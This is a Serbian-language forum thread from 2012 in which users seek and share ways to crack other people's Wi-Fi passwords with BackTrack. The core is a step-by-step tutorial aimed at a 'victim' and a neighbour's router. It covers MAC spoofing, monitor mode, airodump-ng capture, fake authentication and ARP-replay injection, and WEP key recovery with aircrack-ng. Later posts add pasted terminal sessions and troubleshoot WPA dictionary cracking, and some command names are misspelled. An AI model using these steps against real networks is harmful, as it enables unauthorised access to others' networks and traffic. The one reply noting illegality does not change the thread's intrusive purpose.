[ aldair @ 04.02.2012. 00:51 ] @
zna li neko da li mogu preko BackTrack da krekujem pasvord na wifi mrezi, ali da pre toga ne mora da izvrsim konekciju?
[ maksvel @ 04.02.2012. 21:41 ] @
Pa, ako je pristup mreži zaštićen, a ne znaš password, onda i ne možeš da se konektuješ, zar ne?
Poenta password-crackinga je u hvatanju paketa "iz vazduha" i njihova analiza, pa onda, kada se password provali za dati AP, povežeš se na njega.

Ili si možda mislio na neki drugi password??
[ Marenović Slaviša @ 04.02.2012. 23:20 ] @
// Tutorial: kako hakovati wireless konekcije

1. što ce vam trebati je BackTrack ( distribucija Linux-a namijenjena testiranju sigurnosti ), njega možete skiniti na slijedecem linku:
http://www.backtrack-linux.org/downloads/ ( OS je freeware tako da nije warez il' šta ja znam ) .
2. ce vam trebati naravno Wireless uredaj. Ja osobno za BackTrack koristim Gigaset USB Stick 54 koji podržava injection, što je injection napisati cu kasnije.
Svi koji posjeduju laptop ili netbook su vec osigurani !
3. iz Windowsa vidite koji router vam daje najbolji signal.

Kada ste nabavili sve potrebne stvari sprzite BackTrack ( nije bitno koja verzija 3, 4, 4-R1. 4-R2 ) na CD/DVD/USB .
Ja koristim USB stick jer je brži, CD-ove i DVD-ove vjecito gubim il se izgrebu.

Instalacija je na USB je lagana:

Treba vam uredaj sa minimalno 2 GB memorije za 3 i 4 verziju a minimalno 2.5 za R1 i R2 verziju. Skinite .ISO image i
pomocu Unetbootin-a instalirajte na USB ( http://unetbootin.sourceforge.net/ ) , za ovo vam i ne trebaju slike...prejednostavno je.
Odaberite Distribution: BackTrack, odaberite koji je uredaj i to je to ( kod nekih jeftinijih USB-ova malo duže traje postupak )

OK, spremi smo za sve.

-Ubacite USB/CD u PC i restartirajte ga, u boot menu-u odaberite vas uredaj na koji ste instalirali OS.

-Otvara vam se prozor gdje možete odabrati u kojem modu da vam se boota BackTrack, odaberite FrameBuffer ( nebitno koja rezolucija ).

-Otvara vam se terminal, u njega upišite "startx" da bi pokrenuli graficko sucelje.
Kod nekoga ce izbaciti error, u tom slucaju upišite "fixvesa" i zatim startx.

-Ušli smo u graficko sucelje, ništa opasno , u dnu nadite "Terminal" ( crna kockica ) i pokrenite ga. Dobijete nesto kao CMD u Windowsu.
______________________________________________

Prelazimo na pronalaženje WEP key-a, za to nam služe air* komande.

1. moramo vidjeti koje je ime našeg uredaja u Linuxu, upišemo:

airmon-ng

Dobijemo popis uredaja, u mom slucaju to je "wlan0"

2. moramo izgasiti "Monitor mode" na tom uredaju, upišemo:

airmon-ng stop wlan0

3. sada cemo promjeniti MAC ID našeg uredaja, upišemo:

ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0 ( npr. )

Sada smo promjenili naš MAC ID.

4. upaliti "Monitor mode" na uredaju, upišemo

airmon-ng start wlan0

5. došlo je vrijeme da skeniramo Access point-ove ( ubuduce AP ) u blizini, upišemo:

airdump-ng wlan0

Kad nadete željeni AP držite CTRL+C da zaustavite pretraživanje.

6. kopirajte MAC ID ( BSSID - koji je u obliku: XX:XX:XX:XX:XX ) i CHANNEL ( npr. 6 ) od željenog AP-a.

7. vrijeme je da pocnemo skupljati pakete i podatke od AP-a, upišemo:

airdump-ng -w test -c ( broj channela ) --bssid ( BSSDI kopirajte ) wlan0

Sada na desktopu se stvori nova datoteka test-01.cap, nemojte je dirati.

Za uspješno crackiranje WEP key-a trebamo prikupiti bar 30000 paketa (#Data), brzina prikupljana ovisi o aktivnosti na toj vezi,
npr 5 min gledanja Youtube-a je dovoljno za taj broj paketa. Ako vam #Data ide dobrom brzinom slijedece korake preskocite.

______________________________________________

U slucaju da je veza potpuno neaktivna moramo imati uredaj koji podržava "injection", listu podržanih uredaja možete naci na:
http://www.backtrack-linux.org/forums/
Ili sa naredbom: aireplay-ng -9 wlan0

1. moramo se autorizirati na AP-u, upišemo:

aireplay-ng -1 0 -a (BSSID) wlan0

Ako vam piše da je autoritizacija uspjela, injection radi možemo na slijedeci korak.

2. uraditi injection podataka, upišemo

airepay-ng -3 -b (BSSID) wlan0

Ovo bi trebalo ubrzati/pokreniti prikupljanje podataka.

______________________________________________

Skupili smo 30000 podataka ( inace je nekada i 5000 dovoljno, ali sa 30000 je 100% ), pocinjemo sa crackiranjem WEP keya, upišemo:

aircrack-ng test-01.cap

Nekih 2-3 min. ce biti dovoljno da vam nade kljuc, ako i sa 30000 paketa ne nade pokušajte sa još 5000.

Kad nadete key uklonite : iz toga i imate key.

I to je to !

Backtrack je specijalna distribucija Linux operativnog sistema namenjena istraživanju sigurnosti raznih tipova racunarskih sistema.
Kao takva, objedinjuje skup korisnih alata i programa za pribavljanje, analizu i upotrebu podataka relevantnih za bezbednost sistema.

- Besplatna je
- Startuje se sa CD-ROM-a ili USB-a i ne zahteva nikakvu instalaciju
- Može se skinuti na ovom linku: http://www.backtrack-linux.org/downloads/

Skinite omiljenu verziju i spržite je na CD/USB kako bi vam bila pri ruci kad zatreba za ovakav pohod.

Podesite racunar da startuje sistem sa CD-ROM-a/USB-a, ubacite disk i restartujte ga. Sacekajte da se podigne sistem.
Kao vecina Linux/Unix operativnih sistema, startuje se u grafickom modu.
Dakle, dobijate shell za izvršavanje naredbi slican onom u MS-DOS-u, ali znacajno mocniji.

Logujte se na sistem standardom username/password kombinacijom: root / toor.

Startovanje grafickog okruženja vršimo naredbom: startx

1.

Klik na KDE start meni u donjem levom uglu, a zatim na Backtrack -> Wireless Tools -> Analyzers -> Kismet.
Prilikom startovanja pitace za default wireless karticu. Uglavnom je to eth0, a možete je dobiti naredbom iwconfig. (kao na slici).


Ova aplikacija skenira aktivne wireless mreže u blizini i prikazuje njihove MAC adrese. Ovo je od suštinske važnosti za dalje korake.
Odaberite mrežu koju napadate i zapišite njen broadcast name(essid), mac adresu: mac address(bssid) i aktivni frekvencijski kanal (channel).

2.

Pošto imamo osnovne podatke o „žrtvi“, prelazimo u takozvani „monitoring mode“.
Ovaj mod prebacuje wireless karticu iz njene osnovne namene u alat, koji snima pakete ostalih wireless
mreža koji se emituju putem radio talasa i po potrebi ih snima u fajl.

Komandom: „airmon-ng eth0 start“ prelazimo u monitoring mode.

3.

Dakle, sada pratimo saobracaj. Hajde da izolujemo saobracaj žrtve i snimimo ga u fajl. Za ovo ce nam pomoci aplikacija airodump-ng.

U novom terminalu otkucajte: airodump-ng eth0 -w /root/home/packets 9 1

eth0 predstavlja adresu kartice, -w /root/home/packets je lokacija fajla u koji snimamo,
9 je frekvencijski kanal na kom žrtvna komunicira, a 1 govori aplikaciji da snima samo pakete koji sadrže IVS (potreban kljuc).

4.

Potrebni su nam paketi, zato hajde da „prevarimo“ komšijin router, predstavimo se kao validan klijent, i pokušamo da se konektujemo:

aireplay-ng -1 0 -e imemreže -a 00:11:22:33:44:55 -h 00:fe:22:33:f4:e5 eth0

-1 fakeauth tip napada, -e naziv mreže, -a bssid koji smo dobili u koraku jedan, -h mac adresa vaše wireless kartice dobijena komandom iwconfig.

5.

Ok, imamo komunikaciju. Hajde da „ubacimo“ po neki random generisani paket i cekamo na odgovor. U novom terminalu:

aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:fe:22:33:f4:e5 eth0

Šta se dešava. Generišemo random neispravne pakete na koje ruter odgovara. Svaki od tih odgovora je sam po sebi beznacajan,
ali u sebi sadrži kriptovan WEP kljuc. Ako skupimo dovaljnu kolicinu ovakvih odgovora,
možemo da ih analiziramo i utvrdimo šta im je zajednicko. A jedna od tih zajednickoh vrednosti je i kljuc koji tražimo.

Posmatrajte kako odgovori stižu. Da bi izracunali kljuc 64-bitne dužine, potrebno je oko 20-40 hiljada paketa, dok za 128-bitnu enkripciju cekamo oko 200000.

6.

Nakon što ih sakupimo dovaljno, pozivamo aircrack-ng. Aplikaciju koja na osnovu prikupljanih paketa izracunava traženi kljuc.

aircrack-ng -s /root/home/packets

Za nekoliko minuta, aplikacija bi trebalo da za vas izracuna traženi kljuc.
Zapišite ga, restartujte racunar, izvadite disk i startujte vaš stari operativni sistem.

[Ovu poruku je menjao maksvel dana 05.02.2012. u 01:05 GMT+1]
[ aldair @ 05.02.2012. 00:33 ] @
hvala na ovom odgovoru. pokusacu pa cu da kazem da li sam uspeo
[ maksvel @ 05.02.2012. 09:52 ] @
Par napomena...
1. Upad u tudji racunar, odnosno mrezu je nelegalna radnja.
2. WEP je prevazidjen, uglavnom se danas postavlja wpa/psk zastita, koju je znatno teze probiti.
[ deki-bleki @ 06.02.2012. 11:47 ] @
Ima li neki mocniji sistem zastite od wap2?
hoce li biti wapX?
koje su razlike probijanja wap2 od wep?
postupak,korak po korak...na nasem jeziku...(prevod sa engleskog,arapskog,kineskog,ruskog,bugarskog,albanskog....)
[ aldair @ 11.02.2012. 00:41 ] @
pokusao sam ali ovde postoji neki veliki problem. nesto nece da radi, ali ne znam zasto. evo nekog uputstva koje sam nasao.
link
ima neki video na youtube kako radi, ali ja nikako ne mogu da dobijem
pogledajte ko je ovo radio pa neka kaze sta moze da bude
[ Doctor_Oz @ 16.02.2012. 13:24 ] @
sve je to ok ali ako korisnik kojem vidis signal od wifi ne znaci da ga on i koristi, a ako ga on ne koristi ti ne mozes da skupljas paketice koji putuju i da sklupljas delove kljuca
[ aldair @ 16.02.2012. 13:30 ] @
mozes da radis injection, da se autorizujes kao on i da saljes lazne pakete, tako ce ruter da ti odgovara i skupices koliko treba, ali neke wireless kartice nemaju mogucnost za injection, ali drugo sta ma interesuje, kako da krejujem enkripcije koje nisu wep na primer wpa2 i druge
[ Doctor_Oz @ 17.02.2012. 12:55 ] @
Citat:
aldair: mozes da radis injection, da se autorizujes kao on i da saljes lazne pakete, tako ce ruter da ti odgovara i skupices koliko treba, ali neke wireless kartice nemaju mogucnost za injection, ali drugo sta ma interesuje, kako da krejujem enkripcije koje nisu wep na primer wpa2 i druge


kako se radi "injection", i koje su to kartice koje mogu?
a WAP i WAP2 se rade isto ( nisam siguran ), a inace ide ovako


root@root:~# /etc/init.d/networking start
root@root:~# airmon-ng
Interface Chipset Driver

wlan0 Atheros AR2417 ath5k - [phy0]

-----------------------------------------------

root@root:~# airmon-ng stop wlan0
Interface Chipset Driver

wlan0 Atheros AR2417 ath5k - [phy0]
(monitor mode disabled)
mon0 Atheros AR2417 ath5k - [phy0]

-----------------------------------------------

root@root:~# airmon-ng start wlan0
Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
2548 dhclient3
2549 dhclient3
3376 dhclient
3405 dhclient
Process with PID 2549 (dhclient3) is running on interface wlan0
Process with PID 3405 (dhclient) is running on interface wlan0

Interface Chipset Driver

wlan0 Atheros AR2417 ath5k - [phy0]
(monitor mode enabled on mon0)

-----------------------------------------------

root@root:~# airmon-ng


Interface Chipset Driver

wlan0 Atheros AR2417 ath5k - [phy0]
mon0 Atheros AR2417 ath5k - [phy0]

-----------------------------------------------

root@root:~# airodump-ng mon0
CH 7 ][ Elapsed: 57 s ][ 2012-01-30 12:28

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

**:**:**:**:**:** -71 137 1718 51 3 54 . OPN
**:**:**:**:**:** -69 70 0 0 6 54 OPN
??:??:??:??:??:?? -80 33 0 0 1 54 . WPA2 CCMP ?????????
**:**:**:**:**:** -84 34 0 0 1 54 WPA2 TKIP
**:**:**:**:**:** -88 78 0 0 9 54 . WPA2 CCMP
**:**:**:**:**:** -89 64 0 0 11 54 . WPA2 CCMP
**:**:**:**:**:** -94 22 0 0 11 54 OPN
**:**:**:**:**:** -95 14 0 0 8 54 WPA2 TKIP
**:**:**:**:**:** -96 12 0 0 1 54 OPN
**:**:**:**:**:** -97 9 0 0 1 54e. WPA2 CCMP



CTRL + C;

-----------------------------------------------

root@root:~# airodump-ng -w -wep -c[CHANEL NUMBER] --bssid[BSSID NUMBER] mon0


CH 1 ][ Elapsed: 1 min ][ 2012-01-30 12:33

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

??:??:??:??:??:?? -81 55 443 23 1 1 54 . WPA2 CCMP PSK ??????

BSSID STATION PWR Rate Lost Packets Probes

??:??:??:??:??:?? ??:??:??:??:??:?? -86 0 -11 3 16

SHIFT + CTRL + T;

-----------------------------------------------

root@root:~# aireplay-ng -1 0 -a [BSSID] mon0

No source MAC (-h) specified. Using the device MAC ( ??:??:??:??:??:??2)
12:35:04 Waiting for beacon frame (BSSID: ??:??:??:??:??:??) on channel 1

12:35:04 Sending Authentication Request (Open System) [ACK]
12:35:04 Authentication successful
12:35:04 Sending Association Request [ACK]
12:35:04 Denied (code 12), wrong ESSID or WPA ?
. . .


-----------------------------------------------

root@root:~# aireplay-ng -3 -b [BSSID] mon0
No source MAC (-h) specified. Using the device MAC (??:??:??:??:??:??)
12:37:36 Waiting for beacon frame (BSSID: ??:??:??:??:??:??) on channel 1
Saving ARP requests in replay_arp-0130-123736.cap
You should also start airodump-ng to capture replies.
^Cad 39829 packets (got 0 ARP requests and 318 ACKs), sent 0 packets...(0 pps)
. . .
najbolje je sto vise paketa a preporucuje se 30.000
CTRL + C;

-----------------------------------------------

root@root:~# dir
Desktop sad -wep-01.cap -wep-01.kismet.csv
replay_arp-0130-123736.cap TrackMania -wep-01.csv -wep-01.kismet.netxml

root@root:~# aircrack-ng [FILENAME].cap



[ deda22 @ 10.07.2012. 20:49 ] @
imam problemm a i sam ne znam dali on postoii !! :D
owakoo uradim swe onoo za krekovanje wifi-aa i kada na krajuu treba da mi izbaci sifruu za wep nista :D
citao sam ovo na forumu da treba da skupi nekih 30000 paketica meni skupi okoo 800 nekada i manje! dali je u tome problem i da ga pusti da sklupii tihh 30000 paketica! POZzz i hwala unapred ako ste me razumelii u cemuu je problem mojj :D
[ xplosion89 @ 11.07.2012. 03:40 ] @
Ja se izvinjavam sto upada, ali me interesuje mogu li krekovati wireless ako imam ruter ali nisam prikacen na internet?? Da li da bi krekovao wireless moram imati internet konekciju? Isto me interesuje da li je moguce da krekujem wireless ako koristim orion internet i to ovaj dialup usb internet?
zamoliio bih da mi sto pre odg
[ Doctor_Oz @ 11.07.2012. 10:48 ] @
Citat:
deda22:
imam problemm a i sam ne znam dali on postoii !! :D
owakoo uradim swe onoo za krekovanje wifi-aa i kada na krajuu treba da mi izbaci sifruu za wep nista :D
citao sam ovo na forumu da treba da skupi nekih 30000 paketica meni skupi okoo 800 nekada i manje! dali je u tome problem i da ga pusti da sklupii tihh 30000 paketica! POZzz i hwala unapred ako ste me razumelii u cemuu je problem mojj :D


Treba lo bi da se skupi 30.000 paketica jer oni sadrze delove lozinke, sto vise paketica to je bolje. 800 je veoma malo
[ deda22 @ 11.07.2012. 14:49 ] @
Citat:
Doctor_Oz:
Citat:
deda22:
imam problemm a i sam ne znam dali on postoii !! :D
owakoo uradim swe onoo za krekovanje wifi-aa i kada na krajuu treba da mi izbaci sifruu za wep nista :D
citao sam ovo na forumu da treba da skupi nekih 30000 paketica meni skupi okoo 800 nekada i manje! dali je u tome problem i da ga pusti da sklupii tihh 30000 paketica! POZzz i hwala unapred ako ste me razumelii u cemuu je problem mojj :D


Treba lo bi da se skupi 30.000 paketica jer oni sadrze delove lozinke, sto vise paketica to je bolje. 800 je veoma malo



e hwala tii :D
[ deda22 @ 11.07.2012. 22:05 ] @
Citat:
Doctor_Oz:
Citat:
deda22:
imam problemm a i sam ne znam dali on postoii !! :D
owakoo uradim swe onoo za krekovanje wifi-aa i kada na krajuu treba da mi izbaci sifruu za wep nista :D
citao sam ovo na forumu da treba da skupi nekih 30000 paketica meni skupi okoo 800 nekada i manje! dali je u tome problem i da ga pusti da sklupii tihh 30000 paketica! POZzz i hwala unapred ako ste me razumelii u cemuu je problem mojj :D


Treba lo bi da se skupi 30.000 paketica jer oni sadrze delove lozinke, sto vise paketica to je bolje. 800 je veoma malo


skupio sam cak vise od 40000 paketica i kada pokrenem sve izbaci mi owoo a ne znam sta je too

oot@root:~# aircrack-ng crack-01.cap -w wordlist
fopen(dictionary) failed: No such file or directory
fopen(dictionary) failed: No such file or directory
Opening crack-01.cap
Read 214024 packets.

# BSSID ESSID Encryption

1 00:24:D2:58:D6:AF Rangelov WPA (0 handshake)

Choosing first network as target.

Opening crack-01.cap
Please specify a dictionary (option -w).
[ Srđan Pavlović @ 16.07.2012. 07:03 ] @
fopen(dictionary) failed: No such file or directory

Ne moze da nadje fajl sa recnikom, i leba ti pisi sa normalnim slovom "v" :)
[ olioPCP @ 05.09.2012. 11:01 ] @
ako probijaš WPA, treba ti dictionary.. moraš nabaviti što veći dictionary za probiti to (više od 10GB) i može trajati dugo.

Za WEP to ne treba

Inače uzimaj najmanje 50,000 - 60,000 paketa, ja uzmem 70,000 za svaki slučaj